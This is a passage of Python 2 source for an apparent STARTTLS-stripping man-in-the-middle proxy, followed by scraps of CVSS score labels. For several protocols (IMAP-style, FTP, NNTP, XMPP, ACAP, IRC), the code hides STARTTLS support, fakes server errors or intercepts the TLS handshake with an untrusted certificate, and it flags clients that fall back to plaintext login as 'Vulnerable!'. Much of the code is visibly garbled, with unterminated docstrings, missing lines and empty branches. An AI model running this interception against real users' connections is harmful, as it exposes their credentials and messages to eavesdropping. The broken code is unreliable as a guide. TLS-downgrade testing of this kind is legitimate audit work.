                if "STARTTLS" in data:
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                elif "mail from" in data.lower():
                    rewrite.set_result(session, True)
                return data

        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if data.strip().lower().endswith("starttls"):
                    id = data.split(' ',1)[0].strip()
                    # do inbound STARTTLS
                    session.inbound.sendall("%s OK Begin TLS negotation now\r\n"%id)
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr("%s OK Begin TLS negotation now\r\n"%id)))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl
                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if "%s OK"%id not in resp_data:
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                elif " LOGIN " in data:
                    rewrite.set_result(session, True)
                return data
    class FTP:
        _PROTO_ID = 21
        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce AUTH TLS support
                2) raise exception if client tries to negotiated AUTH TLS
            def mangle_server_data(session, data, rewrite):
                if session.outbound.sndbuf.strip().lower()=="feat" \
                    and "AUTH TLS" in data:
                    features = (f for f in data.strip().split('\n') if not "AUTH TLS" in f)
                    data = '\n'.join(features)+"\r\n"
                return data
            def mangle_client_data(session, data, rewrite):
                if "AUTH TLS" in data:
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                elif "USER " in data:
                    rewrite.set_result(session, True)
                return data
        class StripWithError:
            ''' 1) force server error on client sending AUTH TLS
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "AUTH TLS" in data:
                    session.inbound.sendall("500 AUTH TLS not understood\r\n")
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("500 AUTH TLS not understood\r\n")))
                elif "USER " in data:
                    rewrite.set_result(session, True)
                return data
        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "AUTH TLS" in data:
                    # do inbound STARTTLS
                    session.inbound.sendall("234 OK Begin TLS negotation now\r\n")
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr("234 OK Begin TLS negotation now\r\n")))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl
                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if not resp_data.startswith("234"):
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                elif "USER " in data:
                    rewrite.set_result(session, True)
                return data
    class NNTP:
        _PROTO_ID = 119
        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce STARTTLS support
                2) raise exception if client tries to negotiated STARTTLS
            def mangle_server_data(session, data, rewrite):
                if session.outbound.sndbuf.strip().lower()=="capabilities" \
                    and "STARTTLS" in data:
                    features = (f for f in data.strip().split('\n') if not "STARTTLS" in f)
                    data = '\n'.join(features)+"\r\n"
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                elif "GROUP " in data:
                    rewrite.set_result(session, True)
                return data
        class StripWithError:
            ''' 1) force server error on client sending STARTTLS
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    session.inbound.sendall("502 Command unavailable\r\n")  # or 580 Can not initiate TLS negotiation
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("502 Command unavailable\r\n")))
                elif "GROUP " in data:
                    rewrite.set_result(session, True)
                return data
        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    # do inbound STARTTLS
                    session.inbound.sendall("382 Continue with TLS negotiation\r\n")
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr("382 Continue with TLS negotiation\r\n")))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl
                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if not resp_data.startswith("382"):
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                elif "GROUP " in data:
                    rewrite.set_result(session, True)
                return data
    class XMPP:
        _PROTO_ID = 5222
        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce STARTTLS support
                2) raise exception if client tries to negotiated STARTTLS
            def mangle_server_data(session, data, rewrite):
                if "<starttls" in data:
                    start = data.index("<starttls")
                    end = data.index("</starttls>",start)+len("</starttls>")
                    data = data[:start] + data[end:]        # strip starttls from capabilities
                return data
            def mangle_client_data(session, data, rewrite):
                if "<starttls" in data:
                    # do not respond with <proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>
                    #<failure/> or <proceed/>
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                    #session.inbound.sendall("<success xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")  # fake respone
                elif any(c in data.lower() for c in ("</auth>","<query","<iq","<username")):
                    rewrite.set_result(session, True)
                return data 

        class StripInboundTLS:
            ''' 1) Force Server response to *NOT* announce STARTTLS support
                2) If starttls is required outbound, leave inbound connection plain - outbound starttls
            def mangle_server_data(session, data, rewrite):
                if "<starttls" in data:
                    start = data.index("<starttls")
                    end = data.index("</starttls>",start)+len("</starttls>")
                    starttls_args = data[start:end]
                    data = data[:start] + data[end:]        # strip inbound starttls
                    if "required" in starttls_args:
                        # do outbound starttls as required by server
                        session.outbound.sendall("<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")
                        logger.debug("%s [client] => [server][mangled] %s"%(session,repr("<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")))
                        resp_data = session.outbound.recv_blocked()
                        if not resp_data.startswith("<proceed "):
                            raise ProtocolViolationException("whoop!? server announced STARTTLS *required* but fails to proceed.  proto violation: %s"%repr(resp_data))

                        logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))

                return data
            def mangle_client_data(session, data, rewrite):
                if "<starttls" in data:
                    # do not respond with <proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>
                    #<failure/> or <proceed/>
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                    #session.inbound.sendall("<success xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")  # fake respone
                elif any(c in data.lower() for c in ("</auth>","<query","<iq","<username")):
                    rewrite.set_result(session, True)
                return data

        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if "<starttls " in data:
                    # do inbound STARTTLS
                    session.inbound.sendall("<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr("<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl

                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if not resp_data.startswith("<proceed "):
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))

                elif "</auth>" in data:
                    rewrite.set_result(session, True)
                return data

    class ACAP:
        #rfc2244, rfc2595
        _PROTO_ID = 675
        _REX_CAP = re.compile(r"\(([^\)]+)\)")
        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce STARTTLS support
                2) raise exception if client tries to negotiated STARTTLS
            def mangle_server_data(session, data, rewrite):
                if all(kw in data for kw in ("ACAP","STARTTLS")):
                    features = Vectors.ACAP._REX_CAP.findall(data)  # features w/o parentheses
                    data = ' '.join("(%s)"%f for f in features if not "STARTTLS" in f)
                return data
            def mangle_client_data(session, data, rewrite):
                if " STARTTLS" in data:
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                elif " AUTHENTICATE " in data:       
                    rewrite.set_result(session, True)
                return data
        class StripWithError:
            ''' 1) force server error on client sending STARTTLS
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if " STARTTLS" in data:
                    id = data.split(' ',1)[0].strip()
                    session.inbound.sendall('%s BAD "command unknown or arguments invalid"'%id)  # or 580 Can not initiate TLS negotiation
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr('%s BAD "command unknown or arguments invalid"'%id)))
                elif " AUTHENTICATE " in data:
                    rewrite.set_result(session, True)
                return data
        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                return data
            def mangle_client_data(session, data, rewrite):
                if " STARTTLS" in data:
                    # do inbound STARTTLS
                    id = data.split(' ',1)[0].strip()
                    session.inbound.sendall('%s OK "Begin TLS negotiation now"'%id)
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr('%s OK "Begin TLS negotiation now"'%id)))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl
                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if not " OK " in resp_data:
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                elif " AUTHENTICATE " in data:
                    rewrite.set_result(session, True)
                return data

    class IRC:
        #rfc2244, rfc2595
        _PROTO_ID = 6667
        _REX_CAP = re.compile(r"\(([^\)]+)\)")
        _IDENT_PORT = 113
        class StripFromCapabilities:
            ''' 1) Force Server response to *NOT* announce STARTTLS support
                2) raise exception if client tries to negotiated STARTTLS
            def mangle_server_data(session, data, rewrite):
                if all(kw.lower() in data.lower() for kw in (" cap "," tls")):
                    mangled = []
                    for line in data.split("\n"):
                        if all(kw.lower() in line.lower() for kw in (" cap "," tls")):
                            # can be CAP LS or CAP ACK/NACK
                            if " ack " in data.lower():
                                line = line.replace("ACK","NAK").replace("ack","nak")
                            else:   #ls
                                features = line.split(" ")
                                line = ' '.join(f for f in features if not 'tls' in f.lower())
                    data = "\n".join(mangled)
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
                #elif all(kw.lower() in data.lower() for kw in ("cap req","tls")):
                #    # mangle CAPABILITY REQUEST
                #    if ":" in data:
                #        cmd, caps = data.split(":")
                #        caps = (c for c in caps.split(" ") if not "tls" in c.lower())
                #        data="%s:%s"%(cmd,' '.join(caps))
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
        class StripWithError:
            ''' 1) force server error on client sending STARTTLS
            def mangle_server_data(session, data, rewrite):
                if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    params = {'srv':'',
                              'nickname': '*',
                              'cmd': 'STARTTLS'
                    # if we're lucky we can extract the username from a prev. server line
                    prev_response = session.outbound.recvbuf.strip()
                    if prev_response:  
                        fields = prev_response.split(" ")
                            params['srv'] = fields[0]
                            params['nickname'] = fields[2]
                        except IndexError:
                    session.inbound.sendall("%(srv)s 691 %(nickname)s :%(cmd)s\r\n"%params)
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("%(srv)s 691 %(nickname)s :%(cmd)s\r\n"%params)))
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
        class StripWithNotRegistered:
            ''' 1) force server wrong state on client sending STARTTLS
            def mangle_server_data(session, data, rewrite):
                if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    params = {'srv':'',
                              'nickname': '*',
                              'cmd': 'You have not registered'
                    # if we're lucky we can extract the username from a prev. server line
                    prev_response = session.outbound.recvbuf.strip()
                    if prev_response:  
                        fields = prev_response.split(" ")
                            params['srv'] = fields[0]
                            params['nickname'] = fields[2]
                        except IndexError:
                    session.inbound.sendall("%(srv)s 451 %(nickname)s :%(cmd)s\r\n"%params)
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("%(srv)s 451 %(nickname)s :%(cmd)s\r\n"%params)))
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
        class StripCAPWithNotRegistered:
            ''' 1) force server wrong state on client sending CAP LS
            def mangle_server_data(session, data, rewrite):
                if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
            def mangle_client_data(session, data, rewrite):
                if "CAP LS" in data:
                    params = {'srv':'',
                              'nickname': '*',
                              'cmd': 'You have not registered'
                    # if we're lucky we can extract the username from a prev. server line
                    prev_response = session.outbound.recvbuf.strip()
                    if prev_response:  
                        fields = prev_response.split(" ")
                            params['srv'] = fields[0]
                            params['nickname'] = fields[2]
                        except IndexError:
                    session.inbound.sendall("%(srv)s 451 %(nickname)s :%(cmd)s\r\n"%params)
                    logger.debug("%s [client] <= [server][mangled] %s"%(session,repr("%(srv)s 451 %(nickname)s :%(cmd)s\r\n"%params)))
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
        class StripWithSilentDrop:
            ''' 1) silently drop starttls command
            def mangle_server_data(session, data, rewrite):
                if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
        class UntrustedIntercept:
            ''' 1) Do not mangle server data
                2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
                   in case client does not check keys
            def mangle_server_data(session, data, rewrite):
                if " ident " in data.lower():
                    #TODO: proxy ident
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data
            def mangle_client_data(session, data, rewrite):
                if "STARTTLS" in data:
                    # do inbound STARTTLS
                    params = {'srv':'',
                              'nickname': '*',
                              'cmd': 'STARTTLS'
                    # if we're lucky we can extract the username from a prev. server line
                    prev_response = session.outbound.recvbuf.strip()
                    if prev_response:  
                        fields = prev_response.split(" ")
                            params['srv'] = fields[0]
                            params['nickname'] = fields[2]
                        except IndexError:
                    session.inbound.sendall(":%(srv)s 670 %(nickname)s :STARTTLS successful, go ahead with TLS handshake\r\n"%params)
                    logger.debug("%s [client] <= [      ][mangled] %s"%(session,repr(":%(srv)s 670 %(nickname)s :STARTTLS successful, go ahead with TLS handshake\r\n"%params)))
                    context = Vectors.GENERIC.Intercept.create_ssl_context()
                    logger.debug("%s [client] <= [      ][mangled] waiting for inbound SSL handshake"%(session))
                    session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
                    logger.debug("%s [client] <> [      ]          SSL handshake done: %s"%(session, session.inbound.socket_ssl.cipher()))
                    # outbound ssl
                    logger.debug("%s [      ] => [server][mangled] %s"%(session,repr(data)))
                    resp_data = session.outbound.recv_blocked()
                    logger.debug("%s [      ] <= [server][mangled] %s"%(session,repr(resp_data)))
                    if not " 670 " in resp_data:
                        raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
                    logger.debug("%s [      ] => [server][mangled] performing outbound SSL handshake"%(session))
                    logger.debug("%s [      ] <> [server]          SSL handshake done: %s"%(session, session.outbound.socket_ssl.cipher()))
                elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):
                    rewrite.set_result(session, True)
                return data

class RewriteDispatcher(object):
    def __init__(self, generic_tls_intercept=False):
        self.vectors = {}   # proto:[vectors]
        self.results = []   # [ {session,client_ip,mangle,result}, }
        self.session_to_mangle = {}  # session:mangle
        self.generic_tls_intercept = generic_tls_intercept
    def __repr__(self):
        return "<RewriteDispatcher ssl/tls_intercept=%s vectors=%s>"%(self.generic_tls_intercept, repr(self.vectors))
    def get_results(self):
        return self.results
    def get_results_by_clients(self):
        results = {}    #client:{mangle:result}
        for r in self.get_results():
            client = r['client']
            mangle = r['mangle']
            result = r['result']
        return results
    def get_result(self, session):
        for r in self.get_results():
            if r['session']==session:
                return r
        return None
    def set_result(self, session, value):
        r = self.get_result(session)
        r['result'] = value
    def add(self, proto, attack):
    def get_mangle(self, session):
        ''' smart select mangle
            return same mangle for same session
            return different for different session
            try to use all mangles for same client-ip
        # 1) session already has a mangle associated to it
        mangle = self.session_to_mangle.get(session)
        if mangle:
            return mangle
        # 2) pick new mangle (round-robin) per client
        client_ip = session.inbound.peer[0]
        client_mangle_history = [r for r in self.get_results() if r['client']==client_ip]
        all_mangles = list(self.get_mangles(session.protocol.protocol_id))
        if not all_mangles:
            return None
        new_index = 0
        if client_mangle_history:
            previous_result = client_mangle_history[-1]
            new_index = (all_mangles.index(previous_result['mangle'])+1) % len(all_mangles)
        mangle = all_mangles[new_index]
        #mangle = iter(self.get_mangles(session.protocol.protocol_id)).next()
        logger.debug("<RewriteDispatcher  - changed mangle: %s new: %s>"%(mangle,"False" if len(client_mangle_history)>len(all_mangles) else "True"))
        self.session_to_mangle[session] = mangle
        return mangle
    def get_mangles(self, proto):
        m = self.vectors.get(proto,set([]))
        return m
    def mangle_server_data(self, session, data):
        data_orig = data
        logger.debug("%s [client] <= [server]          %s"%(session,repr(data)))
        if self.get_mangle(session):
            data = self.get_mangle(session).mangle_server_data(session, data, self)
        if data!=data_orig:
            logger.debug("%s [client] <= [server][mangled] %s"%(session,repr(data)))
        return data

    def mangle_client_data(self, session, data):
        data_orig = data
        logger.debug("%s [client] => [server]          %s"%(session,repr(data)))
        if self.get_mangle(session):
            #TODO: just use the first one for now
            data = self.get_mangle(session).mangle_client_data(session, data, self)
        if data!=data_orig:
            logger.debug("%s [client] => [server][mangled] %s"%(session,repr(data)))
        return data
    def on_recv_peek(self, s_in, session):
        if self.generic_tls_intercept:
            # forced by cmdline-option
            return Vectors.GENERIC.Intercept.on_recv_peek(session, s_in)
        elif hasattr(self.get_mangle(session), "on_recv_peek"):
            return self.get_mangle(session).on_recv_peek(session, s_in)
def main():
    from optparse import OptionParser
    ret = 0
    usage = """usage: %prog [options]
       example: %prog --listen --remote mail.server.tld:25 
    parser = OptionParser(usage=usage)
    parser.add_option("-q", "--quiet",
                  action="store_false", dest="verbose", default=True,
                  help="be quiet [default: %default]")
    parser.add_option("-l", "--listen", dest="listen", help="listen ip:port [default:<remote_port>]")
    parser.add_option("-r", "--remote", dest="remote", help="remote target ip:port to forward sessions to")
    parser.add_option("-k", "--key", dest="key", default="server.pem", help="SSL Certificate and Private key file to use, PEM format assumed [default: %default]")
    parser.add_option("-s", "--generic-ssl-intercept",
                  action="store_true", dest="generic_tls_intercept", default=False,
                  help="dynamically intercept SSL/TLS")
    parser.add_option("-b", "--bufsiz", dest="buffer_size", type="int", default=4096)
    all_vectors = []
    for proto in (v for v in dir(Vectors) if not v.startswith("_")):
        for test in (v for v in dir(getattr(Vectors,proto)) if not v.startswith("_")):
    parser.add_option("-x", "--vectors",
                  help="Comma separated list of vectors. Use 'ALL' (default) to select all vectors, 'NONE' for tcp/ssl proxy mode. Available vectors: "+", ".join(all_vectors)+""
                  " [default: %default]")
    # parse args
    (options, args) = parser.parse_args()
    # normalize args
    if not options.verbose:
    if not options.remote:
        parser.error("mandatory option: remote")
    if ":" not in options.remote and ":" in options.listen:
        # no port in remote, but there is one in listen. use this one
        options.remote = (options.remote.strip(), int(options.listen.strip().split(":")[1]))
        logger.warning("no remote port specified - falling back to %s:%d (listen port)"%options.remote)
    elif ":" in options.remote:
        options.remote = options.remote.strip().split(":")
        options.remote = (options.remote[0], int(options.remote[1]))
        parser.error("neither remote nor listen is in the format <host>:<port>")
    if not options.listen:
        logger.warning("no listen port specified - falling back to (remote port)"%options.remote[1])
        options.listen = ("",options.remote[1])
    elif ":" in options.listen:
        options.listen = options.listen.strip().split(":")
        options.listen = (options.listen[0], int(options.listen[1]))
        options.listen = (options.listen.strip(), options.remote[1])
        logger.warning("no listen port specified - falling back to %s:%d (remote port)"%options.listen)
    options.vectors = [o.strip() for o in options.vectors.strip().split(",")]
    if 'ALL' in (v.upper() for v in options.vectors):
        options.vectors = all_vectors
    elif 'NONE' in (v.upper() for v in options.vectors):
        options.vectors = []
    Vectors._TLS_CERTFILE = Vectors._TLS_KEYFILE = options.key
    # ---- start up engines ----
    prx = ProxyServer(listen=options.listen, target=options.remote, 
                      buffer_size=options.buffer_size, delay=0.00001)"%s ready."%prx)
    rewrite = RewriteDispatcher(generic_tls_intercept=options.generic_tls_intercept)
    for classname in options.vectors:
            proto, vector = classname.split('.',1)
            cls_proto = getattr(globals().get("Vectors"),proto)
            cls_vector = getattr(cls_proto, vector)
            rewrite.add(cls_proto._PROTO_ID, cls_vector)
            logger.debug("* added vector (port:%-5s, proto:%8s): %s"%(cls_proto._PROTO_ID, proto, repr(cls_vector)))
        except Exception, e:
            logger.error("* error - failed to add: %s"%classname)
            parser.error("invalid vector: %s"%classname)
    prx.set_callback("mangle_server_data", rewrite.mangle_server_data)
    prx.set_callback("mangle_client_data", rewrite.mangle_client_data)
    prx.set_callback("on_recv_peek", rewrite.on_recv_peek)
    except KeyboardInterrupt:
        logger.warning( "Ctrl C - Stopping server")
   " -- audit results --")
    for client,resultlist in rewrite.get_results_by_clients().iteritems():"[*] client: %s"%client)
        for mangle, result in resultlist:
  "    [%-11s] %s"%("Vulnerable!" if result else " ",repr(mangle)))
if __name__ == '__main__':

6.5 Medium


Attack Vector


Attack Complexity


Privileges Required


User Interaction




Confidentiality Impact


Integrity Impact


Availability Impact



5.8 Medium


Access Vector


Access Complexity




Confidentiality Impact


Integrity Impact


Availability Impact